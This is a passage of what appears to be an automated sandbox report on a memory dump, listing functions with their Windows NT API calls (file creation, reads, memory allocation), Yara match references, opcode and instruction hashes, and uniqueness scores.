                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,000A3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000A861D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction ID: a054268856882b70fab69d85b20c3d5365375402527355f796a9fef163e3e6cb
                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                              • Instruction Fuzzy Hash: 16F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A8680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000A86C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: !:
                                                              • API String ID: 2738559852-62046882
                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction ID: 2803bc07e74742361866f44648ad650fa1d327d65464394a32f34539d7fb28d0
                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                              • Instruction Fuzzy Hash: 6BF0B7B2200208AFCB18DF89DC85EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A86FA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL(@=,?,?,000A3D40,00000000,FFFFFFFF), ref: 000A8725
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: @=
                                                              • API String ID: 3535843008-99022194
                                                              • Opcode ID: b5de6bd0b387108e1cfe60257033f6daa565221c5c03852b779f3b9339cf4272
                                                              • Instruction ID: aeffd207ecee021495a2d54419d23bd33d3c1b51f4976fc498789483937fa79d
                                                              • Opcode Fuzzy Hash: b5de6bd0b387108e1cfe60257033f6daa565221c5c03852b779f3b9339cf4272
                                                              • Instruction Fuzzy Hash: 23E08C722002146BD710EF94CC49ED77B69EB44660F054558BA1D9B243C530E600C6E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A8700, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL(@=,?,?,000A3D40,00000000,FFFFFFFF), ref: 000A8725
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: @=
                                                              • API String ID: 3535843008-99022194
                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction ID: 364e1efd0a4ee39bf7aea47cedc203dd5b7e0f48e541e2a6c928a1eb425ed541
                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction Fuzzy Hash: 2BD01776200218ABD714EBD8CC89EE77BACEF48760F154499BA189B242C570FA0086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A87AA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000A87E9
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 18948f2e3fd426bdfe1ac8506122349960e1cfb6fadfb435100b931aa07dcfc1
                                                              • Instruction ID: fa3e9126cfc46b8ea9c9021c8fe92055fa3ccf12e7aa02bdf1704aa18305253b
                                                              • Opcode Fuzzy Hash: 18948f2e3fd426bdfe1ac8506122349960e1cfb6fadfb435100b931aa07dcfc1
                                                              • Instruction Fuzzy Hash: DFF058B2210208AFDB18DF88CC81EEB77ACAF88200F108149FE0997242C630E910CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000A87B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000A87E9
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction ID: 6d337c939bd5961a09b5526a2660e96ba7f608cc02b0948288b7ff14b09fdbfa
                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction Fuzzy Hash: E5F015B2200208ABCB18DF89CC81EEB77ADAF88750F118148BE0897241C630F810CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 020100C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 020107AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0200FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%
